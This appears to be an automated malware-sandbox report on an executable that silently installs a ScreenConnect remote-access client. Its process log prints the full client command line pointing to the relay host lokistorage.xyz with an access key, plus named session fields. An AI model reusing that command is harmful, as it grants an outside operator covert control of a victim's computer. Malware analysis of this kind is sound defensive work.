Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs H36NgltNe7.exe

Uses 32bit PE files

Source: H36NgltNe7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.H36NgltNe7.exe.6763d4.2.raw.unpack, CursorBuffer.cs	Cryptographic APIs: 'TransformBlock'

Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal50.troj.evad.winEXE@17/65@1/1

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)

Source: C:\Users\user\Desktop\H36NgltNe7.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\H36NgltNe7.exe.log

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Users\user\Desktop\H36NgltNe7.exe

File created: C:\Users\user\AppData\Local\Temp\ScreenConnect

Source: H36NgltNe7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: H36NgltNe7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\H36NgltNe7.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\H36NgltNe7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: H36NgltNe7.exe

ReversingLabs: Detection: 21%

Source: H36NgltNe7.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: H36NgltNe7.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)

Source: C:\Users\user\Desktop\H36NgltNe7.exe

File read: C:\Users\user\Desktop\H36NgltNe7.exe

Source: unknown	Process created: C:\Users\user\Desktop\H36NgltNe7.exe "C:\Users\user\Desktop\H36NgltNe7.exe"
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 10C72F14AAC88ABBC0F40DDD9214C022 C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 03D5F726DB338ACF6E810EBD73840770
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FE76E3AF69419F4753BCF881322892BA E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "9bc287e7-1c02-4a4b-bd79-9db7a3015930" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "59802056-0e86-4f92-b003-56a2c2f706f5" "System"
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 10C72F14AAC88ABBC0F40DDD9214C022 C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 03D5F726DB338ACF6E810EBD73840770	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FE76E3AF69419F4753BCF881322892BA E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "9bc287e7-1c02-4a4b-bd79-9db7a3015930" "User"	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "59802056-0e86-4f92-b003-56a2c2f706f5" "System"	Jump to behavior

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
